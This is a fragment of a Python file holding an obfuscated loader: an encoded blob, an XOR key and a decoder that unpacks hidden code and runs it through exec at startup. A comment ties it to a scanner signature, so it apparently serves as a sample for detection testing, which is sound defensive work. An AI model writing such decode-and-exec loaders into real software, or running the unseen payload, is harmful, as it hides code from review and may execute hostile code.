OPuPh4RQbVUjdhF2nBb2HjSF9iNABLX+fGI1nk8uGBAt6Frry4askbvivsZof4ZmBqIEiZYDiktolUa/GP/zLX7UaoZHRQ9//Qt6EEce"
_K = bytes.fromhex("a818e959c652bb90f8e5d8a6")

def _xor(buf, k):
    return bytes(b ^ k[i % len(k)] for i, b in enumerate(buf))

def _decode():
    inner = zlib.decompress(base64.b64decode(_OUTER))
    return _xor(base64.b64decode(inner), _K).decode("utf-8")

if __name__ == "__main__":
    # SC3 signature: base64.b64decode(...) -> exec / compile near by
    exec(compile(_decode(), "<runtime>", "exec"), {})
